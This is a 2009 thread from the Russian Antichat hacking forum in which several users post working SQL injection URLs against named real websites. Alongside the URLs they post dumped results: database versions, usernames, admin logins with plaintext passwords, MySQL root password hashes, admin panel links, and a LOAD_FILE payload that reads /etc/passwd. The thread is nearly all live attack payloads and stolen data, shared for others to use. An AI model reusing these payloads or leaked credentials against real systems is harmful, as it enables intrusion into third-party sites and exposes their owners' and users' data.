ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #8411  
Старый 17.03.2009, 11:06
Аватар для f1ng3r
f1ng3r
Участник форума
Регистрация: 14.01.2009
Сообщений: 257
Провел на форуме:
1936181

Репутация: 688
Отправить сообщение для f1ng3r с помощью ICQ
По умолчанию

Код:
http://www.rtconveer.ru/production/index.php?id=-1+union+select+1,2,3,concat_ws(0x3a,ve rsion(),database(),user()),5,6--&pr=_9
Database Version : 4.0.12-nt
Database name : rt_conveyor_new
User name : root@localhost


админ :

Код:
http://www.rtconveer.ru/production/index.php?id=-1+union+select+1,2,3,concat(user,0x3a,password,0x3a,file_priv),5,6+from+mysql .user--&pr=_9
Код:
root:671100b84af6d5a7
file_priv Y
 
Ответить с цитированием

  #8412  
Старый 17.03.2009, 15:25
Аватар для faza02
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию

Код:
http://www.elpais.com.co/php/opinion/ampliar_opinion.php?id_opinion=-623551+union+select+1,user,3,4,5,6,7,8,9,10,11,12,13,14+from+mysql.user
elpais:1cbbcde00d879eae
 
Ответить с цитированием

  #8413  
Старый 17.03.2009, 16:09
Аватар для .:[melkiy]:.
.:[melkiy]:.
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
Провел на форуме:
5290740

Репутация: 912
По умолчанию

http://www.suzdalfest.ru/index.php?id=-3+union+select+1,2,3,4,5,6,7,8,9,10,11--

Database Version : 4.1.22
Database name : db_masterfilm_4
User name : dbu_masterfilm_1@192.168.9.94

-----------------------------------------------------------------------------------------------------------------

http://www.jazzpoll.com.ua/index.php?id=-3+union+select+1,2,3,4,5,6,7--

Database Version : 5.0.51a
Database name : jazzpoll
User name : jazzpoll@localhost
--
Админ:

Login: ivan
Pass: 2009pass

http://www.jazzpoll.com.ua/login.php/

Последний раз редактировалось .:[melkiy]:.; 17.03.2009 в 16:12..
 
Ответить с цитированием

  #8414  
Старый 17.03.2009, 16:11
Аватар для faza02
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию

Код:
https://breakwaterschool.org/cc.php?s=7&id=-57+union+select+1,2,3,4,5,version(),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25
5.0.77-log

Код:
http://gogetitcredit.com/cc.php?id=-5+union+select+1,version(),3,4,5,6,7,8
5.0.51a

Код:
http://www.beijing-08.info/co.php?cat=bag_bag&page=&id=-21061+union+select+version(),2,3,4,5,6,7,8,9,10
5.0.32-Debian_7etch6-log
olli@localhost:*9D1F6B5862EB12ACFDC64B218DFA08CA38 FE1F62

Последний раз редактировалось jokester; 17.03.2009 в 16:16.. Причина: sea.noctrl.edu БОЯН
 
Ответить с цитированием

  #8415  
Старый 17.03.2009, 16:13
Аватар для f1ng3r
f1ng3r
Участник форума
Регистрация: 14.01.2009
Сообщений: 257
Провел на форуме:
1936181

Репутация: 688
Отправить сообщение для f1ng3r с помощью ICQ
По умолчанию

Код:
http://borets-compressor.ru/special.php?newsid=-1+union+select+1,2,3,4,concat_ws(0x3a,ver sion(),database(),user()),6,7,8,9--
Database Version : 4.1.22-log
Database name : wwwtkboretsru_boretsco
User name : tkborets_boret01@localhost


админ :

Код:
http://borets-compressor.ru/special.php?newsid=-1+union+select+1,2,3,4,concat_ws(0x3a,us ername,password),6,7,8,9+from+admin--
Код:
vasiliy:2cc5ac173a4098b8

Последний раз редактировалось f1ng3r; 17.03.2009 в 16:15..
 
Ответить с цитированием

  #8416  
Старый 17.03.2009, 17:04
Аватар для Gorev
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

http://revistaramuri.ro/index.php?id=-667+union+select+1,2,3,concat_ws(0x3a,version(),da tabase(),user()),5,6,7&editie=31&autor=



Version : 5.0.45-5-log
Database : printmaster
User : printmaster@ns03.digicom.ro


http://revistaramuri.ro/index.php?id=-667+union+select+1,2,3,concat_ws(0x3a,id,email,pas sword,nume),5,6,7+from+printmaster.admusers+limit+ 0,1/*&editie=31&autor=

1:admin:bibani4321

http://revistaramuri.ro/adm/
 
Ответить с цитированием

  #8417  
Старый 17.03.2009, 20:21
Аватар для farex
farex
Banned
Регистрация: 11.03.2009
Сообщений: 214
Провел на форуме:
914766

Репутация: 317
По умолчанию

www.sanvek.ru
site - http://www.sanvek.ru
Код:
http://www.sanvek.ru/index.php?id=20&idm=-344+union+select+1,2,3,4,concat_ws(0x3a,name,login,password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from+wm_users--
database : 5.0.75-log
database_name : sanmebo9_info
table : wm_users
name : Administrator
login : admin
password : partenit
active : Y
 
Ответить с цитированием

  #8418  
Старый 17.03.2009, 20:23
Аватар для spherics
spherics
Участник форума
Регистрация: 14.01.2008
Сообщений: 174
Провел на форуме:
800953

Репутация: 443
По умолчанию

Цитата:
http://www.sonistics.com/smer_update_ind.php?id=44437676657809+union+select +1,2,concat_ws(0x3a,version(),user(),database())--
Version:5.0.67-community
User: sonistic_db@localhost
Database: sonistic_db


Цитата:
http://www.aandmbaits.com/products.php?id=-53+union+select+1,concat_ws(0x3a,version(),user(), database()),3--&cat=WORM+WEIGHTS
Database Version:4.1.22-standard
User name: baits_clerk@localhost
Database name: baits_shop


Цитата:
http://www.bangz.net/staff_detail.php?id=1809865345+union+select+1,2,3, 4,concat_ws(0x3a,version(),user(),database()),6,7, 8,9--

Database Version:4.1.22-log
User name: bangzuser@localhost
Database name: bangz_data



Цитата:
http://www.e-unions.org/russian/people.php?id=17987553888092+UNION+SELECT+1,AES_DE CRYPT(AES_ENCRYPT(CONCAT(0x3a,Version(),0x3a,Datab ase(),0x3a,User(),0x3a),0x71),0x71),3,4,5,6,7,8,9, 10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 ,27,28,29,30,31--

Database Version: 4.1.15-Debian_1
Database name: uks38623
User name: uks38623@localhost


Цитата:
http://www.redballoon.co.za/crafter.php?id=13655579872+union+select+1,2,3,4,co ncat_ws(0x3a,version(),user(),database()),6,7,8,9, 10,11,12,13,14,15,16,17,18,19--&name=The%20Gift%20Connexion
5.0.67-community
redba5_redballoo@localhost
redba5_redballoon


Цитата:
http://noemio.org/shop3.php?num=1798754332+union+select+1,2,3,concat _ws(0x3a,version(),user(),database()),5,6,7,8,9,10 ,11,12--


Version:5.0.67-community
User:noemioc@localhost
Database:noemioc_org



Цитата:
http://www.rockcontest.it/home.php/home.php?id=68764322774+union+select+1,2,3,AES_DEC RYPT(AES_ENCRYPT(CONCAT(0x3a,Version(),0x3a,Databa se(),0x3a,User(),0x3a),0x71),0x71),5,6,7--

Version: 4.1.10
Database: rockcontest_it_anno2004
User: rockcontestread@localhost



Цитата:
http://www.missemistersardegna.it/partecipanti/scheda.php?id=20809861/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,AES_DECRYPT(AES_ENCRYPT(CO NCAT(0x3a,Version(),0x3a,Database(),0x3a,User(),0x 3a),0x71),0x71),13,14--


Version:4.0.27-standard-log
Database: Sql74096_2
User: Sql74096@62.149.131.61


Цитата:
http://sisinflab.poliba.it/index.php?page=projects&id=687696704+union+select+ 1,2,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x3a,Version(), 0x3a,Database(),0x3a,User(),0x3a),0x71),0x71),4,5, 6,7,8,9,10,11--

Version: 4.1.16
Database: snews
User: sisinfpub@localhost



Цитата:
http://www.bandb-toscana.it/strutture_en.php?tipo=provincia&id=798709894698+un ion+select+1,concat_ws(0x3a,version(),user(),datab ase()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 ,20,21,22,23,24,25--

Version: 5.0.68-log
User: Sql112896@62.149.141.58
Database:Sql112896_1



Цитата:
http://www.bestbond.co.za/read_article.php?id=1379875542+union+select+1,2,co ncat_ws(0x3a,version(),user(),database()),4,5,6--

Version: 4.1.21
User: bestbond@localhost
Database: bestbond



Цитата:
http://www.tiffreviews.com/2005/film.php?id=-202+union+select+concat_ws(0x3a,version(),user(),d atabase())--

5.0.67-community-log
dystopia_tiffdb@localhost
dystopia_tiffreviews



Цитата:
http://www.swedishpunk.com/bands.php?id=140+union+select+1,concat_ws(0x3a,ver sion(),user(),database()),3--


5.0.32-Debian_7etch8-log
swedishpunk_com@srv17.one.com
swedishpunk_com

Последний раз редактировалось spherics; 17.03.2009 в 21:31..
 
Ответить с цитированием

  #8419  
Старый 17.03.2009, 21:30
Аватар для .:[melkiy]:.
.:[melkiy]:.
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
Провел на форуме:
5290740

Репутация: 912
По умолчанию

Цитата:
http://www.gbconvention.org/testimony.php?id=-12+union+select+1,2,3,4,5,6--
Version: 5.0.41-community-log
Database: cosmole_gbc
User: cosmole_gbc@98.130.0.130


Цитата:
http://www.legacyandlegacy.com/conferences/details.php?id=-13+union+select+1,2,3,4,5,6,7,8,9--
Version: 4.1.22-standard-log
Database: 347027_legacycms
User: 347027_alfred@172.16.11.187


Цитата:
http://www.awatuhomes.com/news/index.php?id=-00000000016+union+select+1,2,3,4,5,6,7--
Version: 4.1.22-standard-log
Database: 335037_awatucms
User: 335037_alfred@172.16.10.101

Последний раз редактировалось jokester; 17.03.2009 в 22:07.. Причина: hpol.org БОЯН
 
Ответить с цитированием

  #8420  
Старый 17.03.2009, 21:36
Аватар для spherics
spherics
Участник форума
Регистрация: 14.01.2008
Сообщений: 174
Провел на форуме:
800953

Репутация: 443
По умолчанию

Цитата:
http://www.eastcoast-estates.com/search/detail.php?id=3555443437798798+union+select+1,2,3, 4,5,6,7,8,concat_ws(0x3a,version(),user(),database ()),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,2 5,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41--

Version: 5.0.51a-log
User: eastcoas_search@boscgi0404.eigbox.net
Database: eastcoas_realestate




Цитата:
http://www.internationaltradingcompany.info/it/s3_det.php?id=479879865433+union+select+1,2,3,4,5, 6,7,8,9,10,11,concat_ws(0x3a,version(),user(),data base()),13,14,15,16,17,18,19--

Database Version: 5.0.32-Debian_7etch1-log
Database name: intertrading_info
User name: webuser@localhost


Цитата:
http://www.internationaltradingcompany.info/it/s3_det.php?id=479879865433+union+select+1,2,3,4,5, 6,7,8,9,10,11,concat_ws(0x3a,user,password),13,14, 15,16,17,18,19+from+mysql.user--


root : *8CC6D25FFB418EAC1093163C2DB24D644B9DE76F
debian-sys-maint : *A7BB7A135E9236B6861F1F7C22C28027D012C90F
webuser : *2E1319087233E5A3642345C6A55510DAE990B002


Читаем etc/passwd

Цитата:
http://www.internationaltradingcompany.info/it/s3_det.php?id=479879865433+UNION+SELECT+1,2,3,4,5, 6,7,8,9,10,11,CONCAT(0x3a,LOAD_FILE(0x2F6574632F70 6173737764),0x3a),13,14,15,16,17,18,19--

Последний раз редактировалось spherics; 17.03.2009 в 21:58..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ